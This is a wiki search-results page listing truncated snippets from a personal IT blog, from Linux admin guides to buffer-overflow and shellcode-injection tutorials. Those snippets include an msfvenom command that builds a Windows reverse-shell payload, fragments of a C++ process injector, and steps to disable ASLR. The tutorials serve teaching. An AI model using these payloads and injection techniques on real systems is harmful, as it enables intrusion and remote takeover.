Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- n8n installation with Docker Compose @en:linux
- an) ===== ==== 1.1 Uninstall old versions ==== <code bash> sudo apt-get remove docker docker-engine docker.io containerd runc </code> ==== 1.2 Repo installation ==== === 1.2.1 Update apt and activate HTTPS === <code bash> sudo apt-get update sudo apt-get install... tc/apt/sources.list.d/docker.list > /dev/null </code> === 1.2.2 Add Docker GPG Key === <code bash>
- n8n installation with Docker Compose @en:linux:n8n
- an) ===== ==== 1.1 Uninstall old versions ==== <code bash> sudo apt-get remove docker docker-engine docker.io containerd runc </code> ==== 1.2 Repo installation ==== === 1.2.1 Update apt and activate HTTPS === <code bash> sudo apt-get update sudo apt-get install... tc/apt/sources.list.d/docker.list > /dev/null </code> === 1.2.2 Add Docker GPG Key === <code bash>
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
- Open IRC channel @en:irc
- yet familiar with these, you can use the command <code mirc>/rules</code> command in your IRC client. ===== Step 1: Create the channel ===== To create this channel, enter the following: <code mirc>/join #DeinChannel</code> The Deinchannel will of course be named after the respective channel na
- Shellcode Injection Part 1 @en:it-security:blog
- sführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) I... rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); co
- Helpful NMAP scanner commands @en:it-security
- === Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
- Formatting Syntax @en:wiki
- nd_strings_in_your_installation|localisation]]): <code - conf/lang/en/lang.php> <?php /** * Customizati... be modified */ $lang['js']['nosmblinks'] = ''; </code> ==== Image Links ==== You can also use an imag... t use indention for deeper levels - That's it <code> * This is a list * The second item * You... t use indention for deeper levels - That's it </code> Also take a look at the [[doku>faq:lists|FAQ on
- Debian Distribution Upgrade - Squeeze to Wheezy @en:linux:debian
- === 2. display the current Debian version ===== <code bash> cat /etc/debian_version 6.0.7 </code> ===== 3. update packages ===== <code bash> apt-get update apt-get upgrade apt-get dist-upgrade </code> ===== 4. customise the sources.list ===== Adap
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Shellcode Injection Part 2 @en:it-security:blog
- e tools as in part 1. You can download the source code from the [[https://github.com/psycore8/nosoc-shellcode|Github repository]]. \\ \\ ===== Code ===== ==== Explanation ==== Our code should receive the PID of the target process as a parameter at s... 'with the return value of the programme handle. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCE
- Group Managed Service Accounts @en:it-security
- Preparations ===== Create root key on the DC: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Then wait 10 hours to ensure that the replicati... MSA account ===== ==== Create ==== On the DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== test ==== On the target system: <code po
- Archives under Linux @en:linux
- "tar" ===== Archive format: [[wp>tar]] Unpack: <code bash>tar xfv [ARCHIVNAME].tar</code> Packing: <code bash>tar cfv [ARCHIVNAME].tar [VERZEICHNIS1] [VERZEICHNIS2] [DATEI1] [DATEI2]</code> List: <code bash>tar tfv [ARCHIVNAME].tar</code
- Update UnrealIRCD @en:linux
- version 6.1.0) ===== Importing GPG keys ===== <code bash> wget -O- https://raw.githubusercontent.com/... d/unrealircd/unreal60_dev/doc/KEYS|gpg --import </code> ===== Download source ===== First we download ... nstead of x.x.x (e.g. unrealircd-6.1.0.tar.gz). <code bash> wget https://www.unrealircd.org/downloads/unrealircd-x.x.x.tar.gz </code> ===== Check integrity ===== <code bash> wget h
- MySQL Backup under Linux @en:linux:mysql
- ers, we get the following instructions for use: <code bash> $ mysqldump Usage: mysqldump [OPTIONS] data... OPTIONS] For more options, use mysqldump --help </code> With <code bash>$ mysqldump --help</code> all available options are displayed. However, not all of these are rele